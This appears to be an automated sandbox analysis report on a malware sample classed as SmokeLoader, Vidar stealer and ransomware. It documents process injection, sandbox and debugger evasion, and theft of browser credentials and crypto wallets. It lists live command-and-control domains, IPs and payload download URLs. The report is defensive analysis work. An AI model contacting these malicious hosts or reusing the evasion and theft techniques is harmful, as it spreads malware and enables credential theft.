Source: C:\Users\user\AppData\Local\Temp\7791.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7791.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7791.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7791.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7791.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\	Jump to behavior

Source: explorer.exe, 00000002.00000000.327305275.00000000080ED000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000002.00000000.282880040.0000000000680000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _VMware_SATA_CD00#5&280b647&
Source: explorer.exe, 00000002.00000000.299873429.000000000069D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.310748907.000000000847F000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Zu2
Source: explorer.exe, 00000002.00000000.291660972.0000000008223000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000002.00000000.327676762.0000000008223000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G*^d
Source: explorer.exe, 00000002.00000000.323331186.00000000062C4000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.301888940.0000000004287000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0
Source: explorer.exe, 00000002.00000000.283070682.000000000072D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}$$O`
Source: explorer.exe, 00000002.00000000.308446776.000000000820E000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000002.00000000.327305275.00000000080ED000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000002.00000000.291660972.0000000008223000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00l

Anti Debugging

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Source: C:\Users\user\Desktop\hOdgEiePTe.exe	System information queried: CodeIntegrityInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\hcthhbi	System information queried: CodeIntegrityInformation			Jump to behavior

Source: C:\Users\user\Desktop\hOdgEiePTe.exe	Code function: 0_2_00785DD4 push dword ptr fs:[00000030h]	0_2_00785DD4
Source: C:\Users\user\AppData\Roaming\hcthhbi	Code function: 13_2_004A092B mov eax, dword ptr fs:[00000030h]	13_2_004A092B
Source: C:\Users\user\AppData\Roaming\hcthhbi	Code function: 13_2_004A0D90 mov eax, dword ptr fs:[00000030h]	13_2_004A0D90
Source: C:\Users\user\AppData\Local\Temp\900B.exe	Code function: 22_2_00C60D90 mov eax, dword ptr fs:[00000030h]	22_2_00C60D90
Source: C:\Users\user\AppData\Local\Temp\900B.exe	Code function: 22_2_00C6092B mov eax, dword ptr fs:[00000030h]	22_2_00C6092B
Source: C:\Users\user\AppData\Local\Temp\7791.exe	Code function: 29_2_0279092B mov eax, dword ptr fs:[00000030h]	29_2_0279092B
Source: C:\Users\user\AppData\Local\Temp\7791.exe	Code function: 29_2_02790D90 mov eax, dword ptr fs:[00000030h]	29_2_02790D90

Source: C:\Users\user\Desktop\hOdgEiePTe.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hcthhbi	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\900B.exe	Process queried: DebugPort	Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\explorer.exe

File created: hcthhbi.2.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Domain query: cucumbetuturel4.com
Source: C:\Windows\explorer.exe	Domain query: diewebseite.at
Source: C:\Windows\explorer.exe	Domain query: susuerulianita1.net
Source: C:\Windows\explorer.exe	Domain query: linislominyt11.at
Source: C:\Windows\explorer.exe	Domain query: moroitomo4.net
Source: C:\Windows\explorer.exe	Domain query: monsutiur4.com
Source: C:\Windows\explorer.exe	Domain query: nusurionuy5ff.at
Source: C:\Windows\explorer.exe	Domain query: nunuslushau.com
Source: C:\Windows\explorer.exe	Domain query: amarillavida.com

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\hOdgEiePTe.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\Desktop\hOdgEiePTe.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hcthhbi	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hcthhbi	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\900B.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\900B.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\Desktop\hOdgEiePTe.exe	Thread created: C:\Windows\explorer.exe EIP: 2851B44	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hcthhbi	Thread created: unknown EIP: 4A01B44	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\900B.exe	Thread created: unknown EIP: 4B31A18	Jump to behavior

Source: explorer.exe, 00000002.00000000.315656159.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.299793635.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.282886904.0000000000688000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ProgmanEXE^
Source: explorer.exe, 00000002.00000000.322043226.0000000005920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.283135261.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.290103513.00000000080ED000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000002.00000000.283135261.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.300434695.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.316749998.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000002.00000000.283135261.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.300434695.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.316749998.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000002.00000000.316049479.0000000000708000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.283044117.0000000000708000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.299924498.0000000000708000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd4
Source: explorer.exe, 00000002.00000000.283135261.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.300434695.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.316749998.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: WProgram Manager

Source: C:\Users\user\AppData\Local\Temp\7791.exe	Code function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,__calloc_crt,_free,	29_2_027BA957
Source: C:\Users\user\AppData\Local\Temp\7791.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,	29_2_027BB910
Source: C:\Users\user\AppData\Local\Temp\7791.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	29_2_027C0188
Source: C:\Users\user\AppData\Local\Temp\7791.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	29_2_027BACB4
Source: C:\Users\user\AppData\Local\Temp\7791.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_free,_free,_free,_free,_free,_free,_free,_free,_free,	29_2_027B3D96

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected SmokeLoader

Source: Yara match	File source: 00000016.00000002.485561355.0000000000C80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.317713525.0000000002851000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.382652287.00000000004C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.486664675.0000000000D41000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.382836184.0000000002131000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.335353490.0000000000610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.335418387.0000000000631000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

Yara detected Vidar stealer

Source: Yara match	File source: 29.3.7791.exe.27e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.7791.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.3.7791.exe.27e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.7791.exe.2790e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.7791.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.7791.exe.2790e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001D.00000003.515106259.00000000027E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.648449578.0000000002790000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.535099899.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 7791.exe PID: 1824, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: 7791.exe, 0000001D.00000002.597019441.0000000000D65000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\jaxx\Local Storage\
Source: 7791.exe, 0000001D.00000002.597019441.0000000000D65000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: 7791.exe, 0000001D.00000002.597019441.0000000000D65000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\jaxx\Local Storage\
Source: 7791.exe, 0000001D.00000002.597019441.0000000000D65000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: 7791.exe, 0000001D.00000002.597019441.0000000000D65000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\7791.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7791.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7791.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior

Source: Yara match	File source: 0000001D.00000002.535729993.0000000000CEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 7791.exe PID: 1824, type: MEMORYSTR

Remote Access Functionality

Yara detected SmokeLoader

Source: Yara match	File source: 00000016.00000002.485561355.0000000000C80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.317713525.0000000002851000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.382652287.00000000004C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.486664675.0000000000D41000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.382836184.0000000002131000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.335353490.0000000000610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.335418387.0000000000631000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

Yara detected Vidar stealer

Source: Yara match	File source: 29.3.7791.exe.27e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.7791.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.3.7791.exe.27e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.7791.exe.2790e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.7791.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.7791.exe.2790e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001D.00000003.515106259.00000000027E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.648449578.0000000002790000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.535099899.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 7791.exe PID: 1824, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Exploitation for Client Execution	1 DLL Side-Loading	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	4 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	32 Process Injection	4 Obfuscated Files or Information	1 Input Capture	13 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	Exfiltration Over Bluetooth	11 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	23 Software Packing	Security Account Manager	411 Security Software Discovery	SMB/Windows Admin Shares	1 Input Capture	Automated Exfiltration	5 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 DLL Side-Loading	NTDS	12 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	Scheduled Transfer	116 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 File Deletion	LSA Secrets	3 Process Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	11 Masquerading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	12 Virtualization/Sandbox Evasion	DCSync	1 Remote System Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	32 Process Injection	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	1 Hidden Files and Directories	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	1 Regsvr32	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
hOdgEiePTe.exe	59%	Virustotal		Browse
hOdgEiePTe.exe	37%	Metadefender		Browse
hOdgEiePTe.exe	81%	ReversingLabs	Win32.Ransomware.StopCrypt
hOdgEiePTe.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\efthhbi	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\7791.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\900B.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\hcthhbi	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\5D03.dll	100%	Joe Sandbox ML
C:\ProgramData\freebl3.dll	3%	Metadefender		Browse
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	6%	Metadefender		Browse
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	Metadefender		Browse
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	3%	Metadefender		Browse
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	3%	Metadefender		Browse
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	Metadefender		Browse
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\5D03.dll	28%	ReversingLabs	Win32.Trojan.Zenpak
C:\Users\user\AppData\Local\Temp\7791.exe	69%	ReversingLabs	Win32.Infostealer.Bandra

Unpacked PE Files

Source	Detection	Scanner	Label	Download
0.2.hOdgEiePTe.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
22.2.900B.exe.c60e67.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
13.2.hcthhbi.4a0e67.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
22.3.900B.exe.c80000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
13.2.hcthhbi.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
29.2.7791.exe.2790e67.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.2.hOdgEiePTe.exe.5c0e67.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
22.2.900B.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
29.3.7791.exe.27e0000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
13.3.hcthhbi.4c0000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.3.hOdgEiePTe.exe.5d0000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

Source	Detection	Scanner	Link
diewebseite.at	1%	Virustotal	Browse
monsutiur4.com	20%	Virustotal	Browse
amarillavida.com	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
http://piratia.su/tmp/	100%	Avira URL Cloud	malware
http://159.69.101.170/4798399205.zip	100%	Avira URL Cloud	malware
http://ocsp.thawte.com0	0%	URL Reputation	safe
http://159.69.101.170/	100%	Avira URL Cloud	malware
http://159.69.101.170/4798399205.zip/1415	100%	Avira URL Cloud	malware
http://www.mozilla.com0	0%	URL Reputation	safe
https://amarillavida.com/upload/chrome.exe	100%	Avira URL Cloud	malware
http://mupsin.ru/tmp/	100%	Avira URL Cloud	malware
http://159.69.101.170/1415	100%	Avira URL Cloud	malware
http://linislominyt11.at/	100%	Avira URL Cloud	malware
http://faktync.com/tmp/	0%	Avira URL Cloud	safe
http://aingular.com/tmp/	0%	Avira URL Cloud	safe
http://diewebseite.at/tmp/	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
diewebseite.at	175.119.10.231	true	true	1%, Virustotal, Browse	unknown
monsutiur4.com	185.237.206.60	true	true	20%, Virustotal, Browse	unknown
t.me	149.154.167.99	true	false		high
amarillavida.com	206.221.182.74	true	true	0%, Virustotal, Browse	unknown
linislominyt11.at	195.158.3.162	true	true		unknown
moroitomo4.net	unknown	unknown	true		unknown
cucumbetuturel4.com	unknown	unknown	true		unknown
nusurionuy5ff.at	unknown	unknown	true		unknown
susuerulianita1.net	unknown	unknown	true		unknown
nunuslushau.com	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://piratia.su/tmp/	true	Avira URL Cloud: malware	unknown
http://159.69.101.170/4798399205.zip	true	Avira URL Cloud: malware	unknown
https://mastodon.social/@olegf9844e	false		high
https://t.me/ch_inagroup	false		high
http://159.69.101.170/	true	Avira URL Cloud: malware	unknown
https://amarillavida.com/upload/chrome.exe	true	Avira URL Cloud: malware	unknown
http://mupsin.ru/tmp/	true	Avira URL Cloud: malware	unknown
http://159.69.101.170/1415	true	Avira URL Cloud: malware	unknown
http://linislominyt11.at/	true	Avira URL Cloud: malware	unknown
http://faktync.com/tmp/	true	Avira URL Cloud: safe	unknown
http://aingular.com/tmp/	true	Avira URL Cloud: safe	unknown
http://diewebseite.at/tmp/	true	Avira URL Cloud: malware	unknown
http://piratia-life.ru/tmp/	false		high
http://mordo.ru/tmp/	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.mozilla.com/en-US/blocklist/	mozglue.dll.29.dr	false		high
https://t.me/ch_inagroup_	7791.exe, 0000001D.00000003.520547218.0000000000D66000.00000004.00000020.00020000.00000000.sdmp	false		high
https://t.me/ch_inagrouphttps://mastodon.social/	7791.exe, 0000001D.00000003.515106259.00000000027E0000.00000004.00001000.00020000.00000000.sdmp, 7791.exe, 0000001D.00000002.648449578.0000000002790000.00000040.00001000.00020000.00000000.sdmp	false		high
